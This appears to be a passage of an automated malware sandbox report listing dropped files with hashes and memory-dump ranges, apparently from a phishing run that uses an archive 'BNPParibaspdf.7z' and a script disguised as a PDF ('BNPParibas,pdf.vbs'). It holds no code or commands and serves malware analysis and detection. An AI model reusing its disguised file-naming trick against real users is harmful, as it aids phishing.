ef18e2f28bed2f0c9dabd1dd1c6ba45305ee8163

SHA256
0d5197968923943627b4597fde59a0746a7579a7cb2e9233be1232b72fa05473

SHA512
e2b235cfdebc4ddceccb9cd552c602f76de73a2f62f4664b70a602d303187b58b83a608ab63fbb9a4d04e33e461dc35ae14616a5565ce341ba2f3d27448791b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
14KB

MD5
884c4c0c94fa23a963895b8db6078f97

SHA1
81b81557be1f61a4da573e20b502ccde82d744aa

SHA256
f243bdc80acc2ee9778a38bd2172a3a0887aa343897119fff07647a7b6017931

SHA512
853358eebe0c2afed6610c8909df5c85a82e499f20aafedd4baec5e2a18bb455a13db455daecacb3e1d9d1ce6a6b6dcf94d4c9c07df9ea87cdf89cbfaa3adc75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
13KB

MD5
db8b6f4ffec5d666e5bbf94972307e63

SHA1
2dbb9b545ad4cc4b0bf1122d864b90fa7ea4f01a

SHA256
1b7c7882ad48337520a2a200204f8dd0c454bbd0940e4678798ed911bd5e689d

SHA512
39faaac8c584b9c75f833a057bebf14a36cb222d79e35bdddd08c441e674e20ad1a6b58b10797c518cce5bdb570f0bb08510ffbb19ba173486fad777a00d7163

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
13KB

MD5
91d0ccfdffb677f68b4daf33ce97f897

SHA1
f2e3de8a9103470b46603de878fd06bbf245a260

SHA256
d4598fbaa6ee97f6331c956e675d87b5ce365c66e5a817ec2569c001c1d41bad

SHA512
1fd1c4eb1af069f54cdf51ebb774255cb5071095dbd7773993de4c5f8a430a634d14b2cec702e3c5c9f401e0bdedb7bd7677db188e175f74242927ae486d9ae4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
36KB

MD5
2c98dc7f898e3be836e2ca2962d30359

SHA1
ce8cf3f33c528843e1057e17f624a4bcaac880f5

SHA256
982dbb24d10adbe445fdea42174ac03cb865b81167954439ffc06f0ccf5ca672

SHA512
005bdf817fbe6be3438b5f8a0b21b961a00b60847afafa9fa7749540d3137da7ce1cddd030cc342e70a7f0c0f97b99e5f14db5997b9365dd00d0c600e7e3f500

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

Filesize
4KB

MD5
0c2274a553877c1613c76f4a2ed52417

SHA1
2d66bbdad4111949ea6aea08245c5deee76051a8

SHA256
0ba405ad2123bdbc82a81d5609d99dc792d0c037ebb62cd2ed2eb35e5156f0e0

SHA512
4deabf2dd6a57e559fff02cbeb8a03221d272affb81cb6bdd0269448ec51e439894d63625911485a7e53391709e89fe1207e7c2b9c328ae6a911810535708768

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
23KB

MD5
d6aa8ce6f8e8dfe072bcd6c19dc3f5e2

SHA1
5cfc5655742ebe386d642a02d6fe0481d3dd68df

SHA256
95a451511db4e3f0b8c28491eb13e9532ac498743721e39b98e503f120178421

SHA512
6ac50e4341e3f9b19a92d124ace522865c87ef40ba70060d30a435cb2fa0aa8e4cadac02b473675b2ca9b2267f415a142024cd4c13cef717551f31582327a041

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
876B

MD5
2fe7a692f39e12d95c097540da172166

SHA1
ff22f9c933dc2c2b7bb730bd009f131d3a4ee63f

SHA256
5526de643f3f99e6b9407f83fdc8a10322b9d895008f8be1586d516363ae8c4b

SHA512
9eb9963496fc7960804a91b1f08519ffd1679c537020ea6256d33811b5637edfc5452e7f5680aa8f23cddb2594e89918c29b0545d7e9034dee82379734cdccb8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog~RFe5890d1.TMP

Filesize
467B

MD5
3d540276e647c74246a4a18d3894e09c

SHA1
fe47e0760e903c3a4c8241bf9a3532010f22fd47

SHA256
a3583ffed5b67d0f53305ae71655dbaed3ffdc607f6d34e2d646bfda82156761

SHA512
c754407c3285bf4113e7d77ced912297b8f1d69f503bcce46c219c4a4e79521bb08916311a7962e5dc61d6f7cd2d6e45777280a646ff0ed35db84a0428efba10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig

Filesize
22KB

MD5
3f8927c365639daa9b2c270898e3cf9d

SHA1
c8da31c97c56671c910d28010f754319f1d90fa6

SHA256
fc80d48a732def35ab6168d8fd957a6f13f3c912d7f9baf960c17249e4a9a1f2

SHA512
d75b93f30989428883cb5e76f6125b09f565414cf45d59053527db48c6cf2ac7f54ed9e8f6a713c855cd5d89531145592ef27048cf1c0f63d7434cfb669dbd72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig~RFe58914e.TMP

Filesize
3KB

MD5
47430e0e9ad4838b6b88191b7966810f

SHA1
8933b4ce19e396751f93687305d3d378c48e2e0f

SHA256
98c1f419b9efe0d2a9f4350442d90916bd07593d9ecde4706030d1502cfb90d2

SHA512
e3a4e44240a11ce2173acfe66f6b52bdae8fc9c97dfdca441700ab47b5c73a46b71405da95a2cc08c34507fddf4349923c33da57da244e45b5019b9898e6b65c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Data Protection Lists\2.0.0.0\office_endpoints_list.json

Filesize
3KB

MD5
94406cdd51b55c0f006cfea05745effb

SHA1
a15dc50ca0fd54d6f54fbc6e0788f6dcfc876cc9

SHA256
8480f3d58faa017896ba8239f3395e3551325d7a6466497a9a69bf182647b25e

SHA512
d4e621f57454fea7049cffc9cc3adfb0d8016360912e6a580f6fe16677e7dd7aa2ee0671cb3c5092a9435708a817f497c3b2cc7aba237d32dbdaae82f10591c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
30KB

MD5
f93a78598cb74bd5054f6564e1b655da

SHA1
38da0f65c062d2747f47d3268e3f0c46f1bea6d7

SHA256
22078de7df360c0a7e02ab2fb4d47b81651ace5996ccc6f0e014475c06a5e02e

SHA512
05736a1d886ded51185331f79c0a8f100ae75babac5f92ddfe10197c8119a0b958dfdfaee1d564a0113a1270de3eed9f0c365db43a91b68d0e2a43d2a90b8d93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
34KB

MD5
f23692aa03cf338fac0685b80cb19e2b

SHA1
5baeffbd44f12b330fea99c8dff847c1edbdec97

SHA256
3b763c665ecc2d7177de8dd44175e6d9f7c226a25deb1c78ff1574ba37245341

SHA512
1df4228333602235febca6d065b604661f250703505ecf9e232c49055e1c699bee8f8884d1c5b5416558c06d7da91eabbe3ff94190beaf293b861a0827b59d51

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
6KB

MD5
030b1a75217146071e4220aeaf5a7d11

SHA1
9e6ae5387296587eaf37276507cf55717116f5c2

SHA256
78cb53821e08069133500913cc46274ddc71cb25eb2063b944dae3fdb5cb67b2

SHA512
3e74e2e8e7ba4b84040505fac2d9549a963fa4fc1e4408b1293ae5fcad9216c7e877977c8ad5fcb508715f73d52d32212f277c959e496c0246c04a025e174bf3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
30KB

MD5
fa0d6a783126cdc27091c08706316e44

SHA1
837d24cddfee7bb145dd3d62e9fd6f8facbdb7da

SHA256
b9dd7f6793a05003c936d4b56d7f57813d95a9407cd887407fc22c6134908493

SHA512
d645bd51aeb09f9410678f33a4aae047e20d50e85f4db62cbbfddc6d3ee7b2e5678f9a494c33212e8f54f05520cb1e1ae7267fffc500618ebd8aa1078709a42b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
7KB

MD5
a5d4629b1f6948e95f60e24e412389d9

SHA1
dee6976a424470a398cf6ccf609e6004b0285cb8

SHA256
91f79c1b4168a9c657208512901570f6c02fc68b640b87db112a81e308aff629

SHA512
9624c14b6315885e92d11c2736c99a93e1bdad83716a1a511dccc51037ae46dbc39981899def855d5cca50274e1509038c9e688353b1e80d9886709a47e399d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent\1.0.0.5\nav_config.json

Filesize
2KB

MD5
499d9e568b96e759959dc69635470211

SHA1
2462a315342e0c09fd6c5fbd7f1e7ff6914c17e6

SHA256
98252dc9f9e81167e893f2c32f08ee60e9a6c43fadb454400ed3bff3a68fbf0d

SHA512
3a5922697b5356fd29ccf8dcc2e5e0e8c1fd955046a5bacf11b8ac5b7c147625d31ade6ff17be86e79c2c613104b2d2aebb11557399084d422e304f287d8b905

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Filesize
2KB

MD5
9a4cd3359ba9636de66483fb7a3bed64

SHA1
2a9c87ba2395afd0c8ab250d5e791109cfa0affa

SHA256
d678001352b23756d7ebfcf85605e2c7a29daa7d0b7695a886cfde1ade53f325

SHA512
cdf48d3797ed6dd1b2b5bc0f7ac94c985696677d7dcca2a42cca62eb5a48ad67aa33a2c1807fbf7392c881df321b80455f6fbd8c45b8a57ce45cc87b0bb77e41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c2d681744e8ae30d376beecf30c712e8

SHA1
51ff5d6895e0165a29b4fbc7a04e8ff4b5e027c4

SHA256
93988cef7580a553b98808ca7da5bbfaf2266f9c455bbf7442cc4d3a7d7631e5

SHA512
03c646126416744754ebfdbd36a5e8196320baa9e18aadc41d5cd688e5a4350c2f0b3b93165b06b54089338451bb52543cfccbe2a183362a9eabffea470d4a5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\227e79fa-6fff-4ef1-a353-e1647ae96f6c.tmp

Filesize
10KB

MD5
78e47dda17341bed7be45dccfd89ac87

SHA1
1afde30e46997452d11e4a2adbbf35cce7a1404f

SHA256
67d161098be68cd24febc0c7b48f515f199dda72f20ae3bbb97fcf2542bb0550

SHA512
9574a66d3756540479dc955c4057144283e09cae11ce11ebce801053bb48e536e67dc823b91895a9e3ee8d3cb27c065d5e9030c39a26cbf3f201348385b418a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\40c1f9ef-2b18-4bac-814c-81296732e554.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO084EAD78\BNPParibas,pdf.vbs

Filesize
32KB

MD5
dfc5b784b17dff57cbad43dbf6fb582d

SHA1
addde7ad819450c10a67e39d8f49518821f6c296

SHA256
bb453ff3ce310b04ecfe93ff0f3ad8edf939c81a0c94a30842e9404804a3fd64

SHA512
81d57427dfc0b8703cb394e5444ec1dfa531f4a02e829c79f1dc623538a2ee0b57daa5b83ba66b9445b27736945f6ea6ca9c9620a0747783adac9719e0c9f49a

Download Submit
C:\Users\Admin\AppData\Local\Temp\801f1afe-d3b8-4c46-86b0-f11ecdf2ac15.tmp

Filesize
152KB

MD5
dd9bf8448d3ddcfd067967f01e8bf6d7

SHA1
d7829475b2bd6a3baa8fabfaf39af57c6439b35e

SHA256
fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

SHA512
65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a5mykpsd.v0m.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Svulsterne.Cau

Filesize
536KB

MD5
b627c1952693e488e514ffb92633e80b

SHA1
7aca9e0681ffd7895b3b933a7de9a4b644d3b62d

SHA256
28505c5221958bcd1501c44f2cfe8556a99384177e76bb51064733f0521be2ce

SHA512
42aa53d79d549a005b4eef4fb6db28505f61576776c6b1649a4a0842f97d21a9385a1aca18d6dd5041b44ef6ba4bbc8bb4c5ed17dd351fbf1b26c91b82392858

Download Submit
C:\Users\Admin\Downloads\BNPParibaspdf.7z.crdownload

Filesize
18KB

MD5
060fcfd4b50ae94d47f9567e6e675f02

SHA1
30ae99131675596219e25ba8c9befa7f06eac5ca

SHA256
c9077e1e771d75dff78d9041f97b8ec5d716eaffeb65d79f1669a19d78013ee1

SHA512
176732264cf5ea0af7d97ad2ccf01f349e7bf720bbe87da53b394699370ab01fa856a27819323adb5ffc90b3eceec5adbd099e9e5c0b91f2d0c513ffed906a40

Download Submit
memory/2260-655-0x0000000005BE0000-0x0000000005BFE000-memory.dmp

Filesize
120KB

Download
memory/2260-653-0x0000000005600000-0x0000000005954000-memory.dmp

Filesize
3.3MB

Download
memory/2260-661-0x0000000008120000-0x000000000879A000-memory.dmp

Filesize
6.5MB

Download
memory/2260-695-0x00000000087A0000-0x000000000D718000-memory.dmp

Filesize
79.5MB

Download
memory/2260-660-0x00000000074F0000-0x0000000007A94000-memory.dmp

Filesize
5.6MB

Download
memory/2260-659-0x0000000006160000-0x0000000006182000-memory.dmp

Filesize
136KB

Download
memory/2260-658-0x00000000060F0000-0x000000000610A000-memory.dmp

Filesize
104KB

Download
memory/2260-639-0x0000000002290000-0x00000000022C6000-memory.dmp

Filesize
216KB

Download
memory/2260-657-0x0000000006EA0000-0x0000000006F36000-memory.dmp

Filesize
600KB

Download
memory/2260-656-0x0000000005C10000-0x0000000005C5C000-memory.dmp

Filesize
304KB

Download
memory/2260-640-0x0000000004E80000-0x00000000054A8000-memory.dmp

Filesize
6.2MB

Download
memory/2260-642-0x0000000005520000-0x0000000005586000-memory.dmp

Filesize
408KB

Download
memory/2260-643-0x0000000005590000-0x00000000055F6000-memory.dmp

Filesize
408KB

Download
memory/2260-641-0x0000000004D30000-0x0000000004D52000-memory.dmp

Filesize
136KB

Download
memory/2892-738-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/5732-625-0x0000011F64000000-0x0000011F64022000-memory.dmp

Filesize
136KB

Download